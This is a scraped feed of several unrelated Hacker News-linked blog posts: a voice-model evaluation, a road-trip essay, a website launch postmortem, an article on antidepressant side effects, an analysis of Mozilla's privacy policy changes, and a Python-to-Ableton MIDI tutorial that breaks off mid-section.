    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43211399 Fri, 28 Feb 2025 21:27:45 GMT
    <![CDATA[Death Drives in the Aleph: cloud storage, rental cars, & infinity]]> thread link) | @casmalia
    February 28, 2025 | https://www.onshoreleave.com/posts/death-drives/ | archive.org

    2025 · 02 · 26

    "In that single gigantic instant I saw millions of acts both delightful and awful; not one of them occupied the same point in space, without overlapping or transparency... Nonetheless, I'll try to recollect what I can."

    For the better part of ten years, terrified of both impermanence and the false eternities of cloud storage, I never backed up my photos.

    There were a dozen false starts on dropbox. Empty, meticulously named folders sketched out taxonomies that I thought could contain the world in perfect miniature. I would spend days on these systems and then abandon them as soon as some intrinsic fault or other became clear. Few of them would have been legible to anyone else. None could account for the basic fact that I spent most of my time driving rented cars: the least categorizable activity, filling only the loosest stretches between more defined spaces and periods of life.

    It didn’t help that most people I liked couldn’t or wouldn’t drive. Bombing out of the tracks they’d been on at 19, they had scattered to minor but achingly atmospheric cities. I would pick them up with some pretense - the idea of a quest, a great nostalgic return or a new event that seemed to promise a path forward - and then spend weeks driving them around, exchanging so many words that it was as if we were attempting a definitive fusion.

    As much as I enjoyed the conversation, I was happiest when they fell asleep in the passenger seat, and I had another six or seven hours to myself just to drive. I could indulge more fully in what I actually wanted: that delicate puppetry of branches playing across the windscreen or parting briefly to reveal a distant swell of moonlit hills. That sense of being outside of time. The space of the cab encloses you from all this with a series of layers: first the tunnel of the headlights like a formal foyer, then the fogged glass and the glow of the dashboard. There are few things more beautiful than those flickering dials mirrored and projected out over the road. At some point your certainty in the biological body begins to fade; the seat no longer seems to press back up against it. These changes are acknowledged with a dreamy indifference. Whatever envelope contains “you” extends through the vinyl and out to the wheels and body, where that low roar of wind and gravel become cognitive defaults rather than additions. This effect is sensitive. Maintaining it for hours requires a unique set of skills. Some foreign cars will still let you turn the headlights off on the highway to inhabit it more fully. Most music breaks it, but the right song seems to expand its boundaries, the music peeling off and applying itself like a thin layer to the landscape. I’ve never understood what people mean by most pop-psychological states - by “dissociation” or "flow" - but if they are achieving this effect outside of a car, I envy them.

    These drives occurred over the course of ten years: some little more than a few days apart, others occupying wholly different segments of my life - their order and relation attested only in the fragile record of my phone's photo reel. I was morbidly aware of the risks of this approach - so aware that I spent many of my dreams fumbling with shifting camera apps, terrified of missing a photo of some brief roadside vision. And yet when the phone finally succumbed to light rain on Christmas morning, after surviving theft on the Piccadilly Line and half a dozen falls into the ocean, and all 35,000 photos were totally, irrevocably gone, I felt less distraught than unburdened.

    I was unaware that Luxi, in a typically brazen act of competence, had taken the phone some years before and quietly turned on automatic backups. The whole pile now sits in quiet disarray on a Google server, shuffled and duplicated and then shuffled again by a failed cloud migration and my clumsy efforts to impose order: present, mercilessly safe, but a mess beyond redemption.

    It's been two years and I've rarely had the stomach to look at them. When I do, I find road trips dismembered and rearranged: sequences of blurry landscapes taken through the windows of different sedans. You develop tricks to place them. Tree species, the color and width of the lane markings, snatches of language on distant signs all become important. The timestamps in the metadata are distorted by blatant lies - picturing me in 1995, the year of my birth, already towering and haggard beside a Suburban in completely anonymous desert. There are dozens of claustrophobic midnight scenes, back-seat nests in rest stops that will remain forever unnamed. In their haphazard way the pictures reflect that period more accurately than anything I could write here. In memory the drives have nearly fused, less separate events than a parallel mode I sometimes entered.

    I’ve felt devoted to these photos for years like some doomed curator, but I don’t think I ever liked them. Photography doesn’t really interest me. Each one is a committed lie: a promise that someday I'd do something to commemorate that first sensation. Let me show you a few first, without commentary.

    At some point, each one seemed instrumental to a piece of writing that would resolve everything. But by then I was already living too quickly for that to have happened. I was moving between installments of what Luxi took to calling the "death drive", capturing an insidious logic that emerges a few hours into the road trance when the white heat of movement takes hold and you find yourself calculating the farthest point you can reach in the brief tenure of the rental car. There is a perverse necessity to traverse as much of a country as possible, missing every Lonely Planet highlight, and seeing only one distant thing with incredible brief clarity. Ten minutes in Bar Harbor in a blizzard. A few hours at the visitor center of the Shiretoko Peninsula. Pitiless nights huddled under sodden driftwood on the southern coast of Sweden. I would find these places - first by chance, and then again and again in the years that followed, returning obsessively whenever I could - rarely seeing anything new in a country, drawn only to taste again of some sensation so specific that I had craved it for years.

    I would be on the fell southern banks of the Danube one night, looking back at Bratislava as Ortiz read aloud and swirled the trash among the root-bound shallows with his boot - and on top of a ridge in the White Mountains the next, tending an oily fire of the Park Service's rarest and most precious pine needles as Pusic burned too with his own sheer Protestant exuberance. My passengers would model completely opposed understandings of what we were up to - but the proximity of the encounters made for absurd lapses. Driving beside them at night, I would sometimes look over and find that I had gotten them confused.

    You recall other details with an absolute, useless clarity. How a homeless woman standing on the shoulder of the I-95 outside of Bridgeport, Connecticut stared across 30 feet of grey air into the windows of an empty glass factory in a state of full-body rapture. Or how it feels to fall from the trance of the Peak District straight into Sheffield on Ecclesall Road: skidding down a chute of homes that flash from mock Tudor to pebbledash like pictures in a zoetrope. There were whole afternoons when towns in the Midlands seemed the answer, or one answer, already fragile, a potential route forward occluded by a thick pane of glass. The briefest glimpse of an ideal valley has you exiting the freeway only to find slumping rows of brick barracks and cottage-cheese stucco, all of it hanging like a miasmic gel over the hills that formed the locus of your intense longing. These discoveries drove me to constant frustrated movement, an aimless grappling with the finite number of ways you can relate to a certain view, the limited roles available to you in a foreign country's villages.

    When I did stop (and stopping isn't easy at this pace: you realize that the brakes fell off a hundred yards back, that spiritual momentum is as real as physical) there seemed to be some unified theory hovering above it all, some pattern or cipher that would make apparent the role that this series of revelations would play in my life.

    So I would return to the few cities where I was missed and try to make a version of myself legible. When asked how I'd spent the last five years, I realized that I had at once far too much and far too little to say. It helped that outwardly similar lifestyles had become popular while I was gone. Among the people I'd met in college, I could think of a dozen pursuing similar itineraries - but keyed to the numerical outcomes of philanthropy or the scale of SaaS start-ups built in Morroccan coffee shops. The whole thing made coherent by a commitment to some verbose and monolithic value structure. When I stayed with these people's parents - leaning around pyramids of organic produce to make eye contact in dazzlingly lit kitchens - they would reframe what I was doing in the terminology of their children's lives: all of the "optionality", none of the "impact". For my own parents, my passport alone was an object of wonder; looking at its stamps together was among the most uncomplicated joys that the travel offered.

    Then the logistical captors I'd almost forgotten I was fleeing would begin to close in, demanding the periods of frantic industry that kept the whole taped-together machine creaking forward: the rental cars booked and promises made, the scattered sham labor sent off. Already many others I knew were prematurely winding down, scheduling a half-day's recreation two months in advance. As much as anything, I was running from them. In some immature, anarchic way I was proud of this - proud that I was living at a pace that I knew most others couldn't, proud too that I had evaded nearly every external system, every form of constraint. All enabled by the perverse conditions of contemporary life: that all of this is cheaper than sitting still. If you know what you're doing, it's essentially free.

    And then sometimes a photo swims up from the pile and is entirely self sufficient. It pulls you straight back in.

    Wool socks dry on the dashboard. Above, framed in the vanishing arcs of the wiper blades, a series of images appear in miniature before being erased by snow: a weathervane shaped like a leaping horse, derelict bobcat diggers arranged in conspiratorial semicircles, a gazebo slumped in a century's slow fall. Pittsfield, Maine has one open business and it's Vittles, where siblings Rick and Irma skid around on feet as thin and elongated as canoes. Modeling essentially identical bodies, an inheritance in the truest sense, their thorax and rib cage are articulated back between their high sloping shoulders, suggesting a carapace concealed under his battered rain coat, her mottled fuschia jumper. In one perfect gesture, Irma approaches our table, spins a chair around, and straddles it to take our order. When she removes her knit cap, a bob of obsidian hair falls and bounces up from her shoulders with the lively abstraction of a stop motion film. As our omelettes cook, Rick steps outside to clear the snow from the stoop and slides three feet backwards with each desperate destabilizing stab of the shovel. In their own way, skittering around under the crumbling vinyl ceilings, advancing a dialogue that has continued unbroken since their birth ("I was out first!" Irma whispers, wide-eyed), they are the most charismatic people I have met in years. They are minor nobility in exile from a country I have visited only once in a dream.

    That's one more clue; jot it down. The too-powerful metaphors of childhood given complete control: the detective's notepad, a side-quest's checklist superimposed over the world, the Aleph in Carlos Argentino Daneri's cellar. All of it simultaneous and coeternal, attenuating evenly out of meaning as the photos swell beyond any possible usefulness, defying the inferences they seem to make possible. There is constant reflection and yet none at all. None of it can possibly be instrumentalized. The mental catalogue simply growing, the map filling in. Any doubt beaten by the certainty that if only I returned once more to that stretch of agricultural highway where I first felt some atmospheric potential - then it would all come together.

    On December 18th, in the Sunken Gardens of the Santa Barbara Court House, beside a bush where I found a dead man as a child, I married the only person who has kept up; the only person who, on the announcement of a lockdown in London, looked at someone she'd known for two weeks and said something entirely at odds with her upbringing and national character: "Let's get out of here."

    We were in Istanbul within days, walking through a stunned and silent city as we realized, the first of many times over the next four years, the extremity of what we had agreed to. We rented a few cars each month, never signed a lease, never compromised; we constantly looked back.

    I am no longer on shore leave. My daily tasks are flyering hilltop neighborhoods with promises of increasingly vague services, or trying to convince a 60 year old man that I can afford his spare bedroom. For the next few months at least there will only be memories, heavily romanticized - ways of looking back at a previous life that already feels like it's drifting slowly away.

    Last week I took the ferry to Vallejo and bought an '02 Camry from a man by the docks. It's mithril blue with black leather, an early GPS that shows highways a single pixel wide slashing out across a black expanse. There are some new roads out there that my dad told me about: stretches along the river delta that go completely dark at night. I think I’m going to delete the photos.

    ]]>
    https://www.onshoreleave.com/posts/death-drives/ hacker-news-small-sites-43210414 Fri, 28 Feb 2025 20:45:08 GMT
    <![CDATA[How Not to Launch on Hacker News]]> thread link) | @threekindwords
    February 28, 2025 | https://threekindwords.com/blog/how-not-to-launch-on-hackernews/ | archive.org

    One of my blog posts was picked up on Hacker News, and overnight my humble postcard vending machine on the internet got a whole lot more traffic than I expected. And just when everything was set to take off, the machine got jammed, right at my big moment. Here’s a post-mortem of what went down and how I fixed it while still managing to be there for my kid’s birthday.

    Preparing for Launch

    My goals for this past sprint were simple: I set out to launch the blog, hook up analytics, and start a newsletter. I had heard that the secret to SEO was to make great content. So, I spent the first week hammering out three solid posts. The first two detailed the backstory of how I came up with and built the project, while the third was a thinkpiece that reimagined Three Kind Words as a vending machine on the internet.

    Next, I needed a way to see if my content was actually reaching people. I did not want an analytics tool that tracked every mouse movement or forced cookie banners on visitors. Instead, I was looking for something that respects privacy and still provides useful metrics. That is when I discovered goatcounter.com. It was lightweight and showed the metrics that mattered to me: page views, referrers, and details like browser size and operating system. It turned out to be exactly what I needed, and best of all, it was free to get started.

    “It works on my machine”

    I published the blogs and sent the links to a few of my friends. Everything still looked and worked perfectly on my end, and I felt confident that we were ready to launch. That is, until a friend reported that the site looked completely broken. A screenshot they shared showed that the words and styles lists were not loading. I couldn’t replicate it.

    WHY????

    WHY????

    Strangely, when they switched to Safari’s private mode, the site started working and they placed an order. However, the PDF preview turned out all kinds of wrong. The background color that my friend had chosen was missing. I had not changed that part in ages, so it was obvious that something was amiss. I contacted PostGrid support, but since it was Friday afternoon, I did not expect to hear back anytime soon.

    The background is supposed to be yellow…

    The background is supposed to be yellow…

    I had spent months building this thing and it was finally ready to launch, but now it was broken and I had no idea why. Looking at a flat line in my analytics, I felt like I was fighting an uphill battle just to catch anyone’s attention. Exhausted and frustrated, I went to bed wondering why everything worked perfectly for me but failed for my friend. And what’s up with the PDF previews?

    My Ill-Fated Hacker News Moment

    I had no idea that as I slept, my “vending machine on the internet” post would light up on Hacker News and climb to the front page. I woke up to a flurry of unexpected newsletter signups and, believe it or not, random people on the internet giving me money. Checking goatcounter, I saw that the post had already generated about 12,000 page views.

    When I clicked on the Hacker News link, I instantly recognized that the issue my friend had pointed out was now affecting a lot more people. It was like watching a train wreck in slow motion.

    Doh

    Doh

    Not to mention that it was my oldest child’s birthday party that day. In those few precious minutes between party prep and cake time, I skimmed through the comments and logs. More users were reporting that parts of the site were broken. I tried to fix some stuff in a hurry, but didn’t have time to figure out the root cause.

    I made the decision to stop obsessing over the site and be there for my daughter’s birthday. There were cinnamon rolls, a massive cheesecake, and core memories being made. I chose to be present, and I have no regrets.

    Taming the Chaos

    After the party ended and the house finally quieted down, I poured myself a cup of tea and dug into it. Turns out those SEO changes I made had accidentally removed a critical data template from the Hugo configuration. This template was responsible for pulling the available set of words from my backend.

    This is what broke everything

    This is what broke everything

    I suspect that either Cloudflare was serving an older version of the site or that some browsers (Firefox, for example) could not find the essential words.json file. Without this file, the rest of the JavaScript would break and leave users with an unusable interface.

    Once I identified the issue, I dove into the code, restored the missing template, and pushed the changes. I then cleared the cache in Cloudflare, hoping to resolve the problem. It worked. Orders started coming in again, and I began to breathe a little easier.

    Then came another problem: the PDF previews were missing their background color. They had worked perfectly before, but suddenly the CSS wasn’t being applied. Even hardcoding the style did nothing. I reached out to an LLM for help. It confidently explained that HTML-to-PDF rendering can be extremely finicky and suggested I switch from standard HTML/CSS to SVGs for both the background and text layout. Somehow it worked. PostGrid soon began rendering the PDFs correctly, and I regnerated all the postcards in the queue.

    Ahh, much better!

    Ahh, much better!

    Lessons Learned

    I should not be manually testing the site after every change. I should have a CI/CD pipeline that tests the site prior to deployment. For that to work, I need to write some tests. With a little help from an LLM, I got a suite of Playwright tests up and running in no time. Next, I can get these tests running in a GitHub Actions workflow, so it tests the site before it is deployed.

    Also, I need to ensure that when I am testing locally, I am not using a cached version. From now on, I will use this command to run my hugo server:

    hugo server --disableFastRender --gc --ignoreCache

    Using all of these switches will ensure that I am always working with the latest version of the site. It is a bit overkill, but it is better to be safe than sorry! Together with a suite of automated tests, I can have a much more reliable system and hopefully fewer embarrassing deployments.

    PROTIP: checkout Playwright’s built-in UI: npx playwright test --ui

    PROTIP: checkout Playwright’s built-in UI: npx playwright test --ui

    Reflections

    With the launch chaos finally behind me, I took a moment to step back. I went out onto the front porch, watched the wind ruffle the treetops, and listened to the calm that a winter evening can bring. In that quiet moment, I reflected on everything that had happened.

    I felt a mix of regret, pride, and hope. I regret that things were far from perfect during my big moment on Hacker News. I am proud that I wrote a compelling blog post and shipped a product that people seem to like. I am hopeful that even though the site was down for a while, I still managed to take in nearly 50 orders, which equates to about 150 kind words. This boost alone will bring me past the halfway point of my goal of 300 kind words in 2025. Maybe I should revise that goal?

    I have also been encouraged by the feedback I received. One person told me, “I am a corporate software engineer and the things I build rarely affect normal people. Seeing your project, which can bring joy to everyday lives, is incredibly inspiring.” Another developer commented, “As a software dev myself, the idea of a passive income site is intriguing. The concept of a vending machine resonates with people like me.” I think I am onto something with the mental model of a vending machine as a creative catalyst for makerpreneurs. I am encouraged to keep writing about it and see where it goes.

    Altogether, this experience taught me about resilience, the importance of owning my mistakes, and the value of staying true to my vision even when the internet is screaming in my face. It is not solely about making money or chasing trends; it is about creating something that reflects who I am, with all my imperfections.

    Keep on shining, and as always, stay kind.

    ]]>
    https://threekindwords.com/blog/how-not-to-launch-on-hackernews/ hacker-news-small-sites-43210382 Fri, 28 Feb 2025 20:43:26 GMT
    <![CDATA[A quick ramp-up on ramping up quickly in SpiderMonkey]]> thread link) | @jamii
    February 28, 2025 | https://www.hytradboi.com/2025/0a4d08fd-149e-4174-a752-20e9c4d965c5-a-quick-ramp-up-on-ramping-up-quickly | archive.org

    Unable to extract article]]>
    https://www.hytradboi.com/2025/0a4d08fd-149e-4174-a752-20e9c4d965c5-a-quick-ramp-up-on-ramping-up-quickly hacker-news-small-sites-43210218 Fri, 28 Feb 2025 20:35:06 GMT
    <![CDATA[Programming Without Pointers]]> thread link) | @jamii
    February 28, 2025 | https://www.hytradboi.com/2025/05c72e39-c07e-41bc-ac40-85e8308f2917-programming-without-pointers | archive.org

    Unable to extract article]]>
    https://www.hytradboi.com/2025/05c72e39-c07e-41bc-ac40-85e8308f2917-programming-without-pointers hacker-news-small-sites-43209718 Fri, 28 Feb 2025 20:04:04 GMT
    <![CDATA[delete]]> thread link) | @johnnybzane
    February 28, 2025 | https://medtour.help/primenenie-antidepressantov-svyazano-so-stojkoj-poterej-chuvstvitelnosti-genitalij/ | archive.org

    Antidepressant use is associated with sexual side effects, and is often accompanied by decreased genital sensitivity that persists even after the medication is discontinued, according to a new study from Simon Fraser University.

    The study, published in the journal Social Psychiatry and Psychiatric Epidemiology, shows that 13 percent of people taking antidepressants reported decreased genital sensitivity, compared with one percent of people taking other psychiatric medicines.

    This problem has long been overlooked, largely because of stigma, shame and embarrassment to patients. For some, the problem went away with time, but for many it remains for a long time.

    Sexual dysfunction after taking antidepressants such as SSRIs is an understudied and underreported syndrome of persistent sexual dysfunction in which sexual function does not recover even after the drug is discontinued.

    “I’ve had to talk to teens who have had this experience, and it’s horrible. There’s no way to describe how severe this trauma is for people. It’s not just about ‘numb’ genitalia – it’s about what it can mean for a relationship when you become impotent/frigid without your consent. This is serious harm,” says principal investigator Travis Salway.

    In some people, this side effect manifests itself in a mild form: the genitalia become less sensitive, maybe 80 percent of what it used to be. In more severe cases, there is complete numbness.

    The study was part of a large survey (~9,600 mostly LGBTQ youth in Canada and the US) that focused on mental health, conversion therapy, and other factors that shape experiences related to gender and sexuality in adolescence and early adulthood.

    “This study reminds us that pharmacological interventions play a role in shaping young people’s sexual experiences, and there is a critical need for better understanding and education in this regard,” said Travis Salway, SFU associate professor of health sciences and principal investigator of the study.

    As part of the questionnaire, participants were asked if they had ever taken antidepressants, discontinued them and subsequently experienced a range of symptoms characteristic of antidepressant-induced sexual dysfunction (AISD). Research on AISD is complicated by the fact that many symptoms, such as low libido, can also be attributed to depression. However, genital numbness, known as genital hypoesthesia, is a symptom of AISD that is not associated with depression.

    “There is no medical explanation for why people should experience genital numbness due to depression or anxiety (or other common conditions for which SSRIs/SNRIs are prescribed),” Salway explains. – “The frequency of genital hypoesthesia in those with a history of antidepressant use was more than 10 times the frequency we observed in those taking other psychotropic medications (e.g., antipsychotics or sedatives).

    Part of the problem is the lack of informed consent and accountability. Although antidepressants are often prescribed to people suffering from anxiety, obsessive-compulsive disorder, post-traumatic stress disorder, panic disorder, phobias, chronic pain, depression and other conditions, people are not warned about the risks.

    The findings emphasize the need for better education of patients and prescribing physicians, as well as warnings, so that patients can decide for themselves whether such risks are worth taking.

    Published:

    Updated:

    PhD. Olexandr Voznyak

    Do you have any questions?

    Get a free consultation from our experts

    ]]>
    https://medtour.help/primenenie-antidepressantov-svyazano-so-stojkoj-poterej-chuvstvitelnosti-genitalij/ hacker-news-small-sites-43209652 Fri, 28 Feb 2025 19:58:24 GMT
    <![CDATA[Removed – Mozilla doesn't sell data about you, and we don't buy data about you]]> thread link) | @guptadeepak
    February 28, 2025 | https://guptadeepak.com/mozillas-data-practices-and-privacy-evolution-recent-developments/ | archive.org

    Mozilla's Stance on User Data

    Mozilla has long built its reputation on privacy, positioning Firefox as an alternative to data-hungry tech giants. For years, Firefox's messaging included explicit assurances that "Mozilla doesn't sell data about you, and we don't buy data about you." However, Yesterday (Feb 27, 2025), Mozilla updated its Data Privacy FAQ with more nuanced language, now stating: "Mozilla doesn't sell data about you (in the way that most people think about 'selling data'), and we don't buy data about you."

    Feb 06, 2025 - Snapshot of Mozilla Data Policy

    This rewording acknowledges that while Mozilla shares some data with partners for Firefox's "commercial viability," such data is stripped of identifying information, shared in aggregate, or protected via privacy-preserving techniques. The change was prompted by increasingly broad legal definitions of "data sales" in certain jurisdictions, making Mozilla cautious about making absolute promises.

    Feb 28, 2025 - Snapshot of Mozilla Data Policy

    Mozilla maintains that its business model doesn't depend on selling personal data. The organization's primary revenue (over 90%) comes from search engine partnerships, particularly its agreement with Google to serve as Firefox's default search engine.

    New Terms of Use and Privacy Policy Changes

    27 February 2025, Mozilla introduced official Terms of Use for Firefox for the first time, along with an updated Privacy Notice. Previously, Firefox operated under an open-source license with informal privacy commitments. Mozilla explained this change as necessary to make its commitments "abundantly clear and accessible" in today's complex tech landscape.

    The rollout sparked controversy among users when they noticed the removal of the explicit promise "Unlike other companies, we don't sell access to your data" from Mozilla's website and materials. This omission led to speculation that Mozilla might be preparing to sell user data, despite the organization's denials.

    Another controversial point emerged from a clause in the new Terms of Use about user-submitted information. The terms asked users to "grant Mozilla a nonexclusive, royalty-free, worldwide license" to use information entered into Firefox. Taken at face value, this sounded as if Mozilla claimed rights over everything users type into the browser. Mozilla quickly clarified that this license only exists to make Firefox's basic functionality possible (processing URLs, performing searches, etc.) and that all data usage remains governed by the Privacy Notice's protections.

    Many of these changes came to light before Mozilla's official announcements, thanks to its open development process. GitHub users spotted the changes in Mozilla's repositories, particularly the deletion of the line about not selling user data from the Firefox FAQ page.

    Developers on GitHub expressed concern, with commenters urging that "the rationale for this ToS change is discussed in public," noting it seemed counter to Mozilla's principles of transparency and privacy.

    On social media and forums, reactions ranged from disappointment to outrage. Some users accused Mozilla of betraying its privacy ethos, while others expressed skepticism about Mozilla's semantics—arguing there was little difference between "selling data" and "sharing it with partners" who provide revenue. Many long-time Firefox users discussed switching to alternative browsers like LibreWolf, Brave, or Safari.

    Mozilla responded by publishing explanatory blog posts and engaging in forum discussions, but the initial lack of upfront communication allowed rumors to proliferate.

    Privacy Incidents: Telemetry and Advertising Attribution

    Beyond the Terms of Use controversy, Mozilla has faced other privacy-related challenges. In mid-2024, Mozilla implemented Privacy Preserving Attribution (PPA)—a system to help advertisers measure ad effectiveness without exposing individual user identities. However, it was enabled by default in Firefox 128, sending limited data about whether ads led to Firefox installations or website visits without explicit user opt-in.

    This caught the attention of European privacy advocates. In September 2024, the Austrian digital rights group noyb filed a formal GDPR complaint, alleging that Mozilla had introduced tracking without users' consent. Mozilla defended PPA as privacy-preserving and less invasive than typical ad trackers, but admitted it "should have done more" to inform users and gather feedback.

    A related issue involved Mozilla's use of Adjust, a third-party telemetry tool in mobile Firefox versions. In 2024, it came to light that Firefox for Android and iOS were sending data to Adjust to track how Mozilla's ads led to app installs, without prominent disclosure. Following community backlash, Mozilla removed the Adjust SDK from its mobile apps by August 2024.

    Mozilla acknowledged regretting enabling such telemetry by default but explained the pressure it faced from advertisers who demand feedback on their campaigns. The compromise was to implement privacy-focused solutions and use aggregated metrics, though not everyone was convinced this was sufficiently transparent.

    Product Updates Emphasizing Privacy

    Despite these controversies, Mozilla continues to ship product updates aimed at enhancing user privacy. In Firefox version 135 (December 2024), Mozilla retired the old "Do Not Track" (DNT) setting in favor of the more robust Global Privacy Control (GPC) signal. Unlike DNT, which was widely ignored by websites, GPC has legal backing in regions like California, making it a more enforceable choice for users wanting to opt out of data collection.

    Mozilla has also strengthened technological protections against tracking. In June 2022, Firefox rolled out Total Cookie Protection by default to all users, a milestone in browser privacy. This feature isolates cookies to the site where they were created, essentially giving each website its own "cookie jar" and preventing trackers from using third-party cookies to follow users across the web.

    Additionally, Firefox's Enhanced Tracking Protection continues to block known trackers, fingerprinters, and cryptominers by default. Firefox's private browsing mode goes even further, blocking social media trackers and providing complete cookie isolation.

    As Google Chrome moves to Manifest V3 (which limits the capabilities of ad-blockers), Mozilla has announced it will continue supporting the older Manifest V2 for Firefox add-ons alongside Manifest V3. This ensures users can keep using robust ad-blockers and privacy extensions without disruption, demonstrating Mozilla's willingness to diverge from Chrome in defense of user choice.

    Organizational Decisions and Notable Developments

    One significant controversy involved Mozilla's partnership with OneRep for its "Mozilla Monitor Plus" service, which helps users remove personal information from data broker websites. In March 2024, an investigative report revealed that OneRep's founder and CEO also owned numerous people-search and data broker sites—the very kind of privacy-invasive services OneRep claimed to protect users from.

    Mozilla quickly announced it would terminate the partnership, stating that "the outside financial interests and activities of OneRep's CEO do not align with our values." However, as of early 2025, Mozilla was still in the process of disentangling from OneRep, explaining that finding a replacement service was taking longer than anticipated.

    Beyond specific controversies, Mozilla has been diversifying its product portfolio to reduce reliance on the Firefox-Google search deal for revenue. New initiatives include Mozilla VPN and Mozilla.ai, a startup focused on ethical AI. The organization has also made difficult financial decisions, including layoffs in recent years, to maintain stability while continuing to advocate for an open, privacy-respecting web.

    Conclusion and Implications

    Claims that "Mozilla is selling user data" are not supported by evidence—Mozilla's policies emphasize that any data sharing happens in a privacy-conscious way. However, by removing its absolute "we never sell data" pledge and adding legal language about data licenses, Mozilla inadvertently created doubt among its loyal users.

    The community reactions demonstrate that Mozilla's user base holds it to a higher standard than other browser makers. Every move that hints at dilution of privacy or transparency faces immediate scrutiny. This pressure keeps Mozilla aligned with its founding principles, as evidenced by its quick responses to clarify policies or reverse course on contentious features.

    For users, two points are clear: Firefox remains one of the most privacy-friendly mainstream browsers, with features like Total Cookie Protection, tracker blocking, and powerful extension support. Unlike many tech companies, Mozilla does not monetize by profiling users or selling targeted ads based on browsing history. However, users must stay vigilant to ensure Mozilla maintains its privacy commitments.

    From an industry perspective, Mozilla's handling of these issues could influence broader norms. When Firefox pushes privacy features like cookie isolation or GPC signals, it pressures competitors to offer similar protections. Mozilla is essentially testing whether a major software product can sustain itself without compromising user trust.

    In summary, Mozilla is navigating complex legal, financial, and perceptual challenges regarding user data while striving to uphold its core ethos: "Internet for people, not profit." As long as Mozilla continues to engage with its community and prioritize privacy in tangible ways, Firefox will likely retain its position as the browser of choice for privacy-conscious users, and its developments will continue to influence the broader fight for online privacy.

    ]]>
    https://guptadeepak.com/mozillas-data-practices-and-privacy-evolution-recent-developments/ hacker-news-small-sites-43209622 Fri, 28 Feb 2025 19:55:34 GMT
    <![CDATA[Controlling Ableton with Python]]> thread link) | @phantomshelby
    February 28, 2025 | https://sangarshanan.com/2025/02/25/connecting-python-with-ableton/ | archive.org

    Okay, so if you’ve ever seen me rocking a T-shirt, there’s like a 90% chance I snagged it at a Pycon. So yeah, I’m kinda obsessed with using Python for everything lol. I’ve been messing around with Ableton lately, trying to add “DAW guru” to my list of skills. And the first thing I wondered was: Can I control this thing with Python?

    Turns out, there are two ways to do this. The first (and easiest) is sending MIDI signals to Ableton. The second, which takes a bit more setup, is actually talking to Ableton directly – querying and controlling the interface. This is where OSC comes in, and Live has an API for it.

    Let’s dive into sending MIDI first!

    Sending MIDI data to Ableton Live

    To get Python and Ableton chatting, we’ll use “Inter-Application Communication” (IAC). It’s basically a virtual cable that lets software share data on the same computer.

    Here’s the lowdown on setting it up (if you’re on a Mac like me):

    1. Open Audio MIDI Setup: It’s hiding in /Applications/Utilities.
    2. Show MIDI Studio: Go to Window -> Show MIDI Studio.
    3. Enable IAC Driver:
      • Double-click the IAC Driver icon (it’ll probably be grayed out).
      • Tick the “Device is Online” box.
      • Add a few MIDI Ports by hitting the + button. Think of these as virtual MIDI cables.
      • Apply the changes.
    4. Configure Ableton Live:
      • In Ableton, find the MIDI track you want to boss around.
      • Change the “MIDI From” setting from “All Ins” to “IAC Driver (Bus 1)” (or whichever bus you made).
      • Assign different channels for different MIDI tracks/instruments if you want to control multiple instruments.

    Boom! Ableton’s now ready to listen to Python’s MIDI commands.

    We’ll use the rtmidi library to fling MIDI messages from Python and python-osc to get data back from Ableton.

    Here’s a taste of sending MIDI notes to Ableton:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    
    import time
    import rtmidi
    
    midi_out = rtmidi.MidiOut() # Create a MIDI output object
    midi_out.open_port(0) # Open the first available MIDI port
    
    def send_notes(pitch=60, repeat=1, sleep_time=0.5):
        """Sends MIDI notes to the specified track."""
        for _ in range(repeat):
            note_on = [0x90, pitch, 112] # note on (channel, pitch, velocity)
            note_off = [0x80, pitch, 0] # note off (channel, pitch, velocity)
            midi_out.send_message(note_on) # Send the note on message
            time.sleep(sleep_time) # Wait for the specified duration
            midi_out.send_message(note_off) # Send the note off message
    
    # Send MIDI i.e Play notes
    send_notes(60, 3, 0.75)
    send_notes(62, 1, 0.5)
    send_notes(68, 4, 0.25)
    send_notes(58, 2, 0.5)
    

    Go forth and make some noise!

    Generative Melodies with Markov Chains

    Now that we can fire off MIDI notes, how about creating melodies using Markov chains? A Markov chain is a fancy name for a model that predicts the next note based on the current one.

    You can find an example in the ableton-connect repository. The code cooks up a Markov chain from a bunch of training notes and then uses it to whip up a sequence.

    Here’s the gist of it:

